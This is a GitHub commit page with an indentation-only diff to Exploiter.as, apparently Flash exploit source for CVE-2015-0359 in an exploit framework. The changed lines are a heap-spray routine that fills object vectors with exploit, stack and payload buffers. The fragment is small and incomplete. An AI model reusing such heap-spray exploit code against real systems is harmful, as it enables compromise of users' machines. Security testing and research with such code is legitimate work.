Skip to content

Commit 1d05ce1

Browse files
committed
Fix for indentation
1 parent 7202e27 commit 1d05ce1

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

external/source/exploits/CVE-2015-0359/Exploiter.as

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -54,11 +54,11 @@ package
5454
Logger.log("[*] Exploiter - spray_objects()")
5555
for (var i:uint = 0; i < spray.length; i++)
5656
{
57-
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
58-
spray[i][0] = eba.ba
59-
spray[i][1] = exploit
60-
spray[i][2] = stack
61-
spray[i][3] = payload_space
57+
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
58+
spray[i][0] = eba.ba
59+
spray[i][1] = exploit
60+
spray[i][2] = stack
61+
spray[i][3] = payload_space
6262
}
6363
}
6464

0 commit comments

Comments
 (0)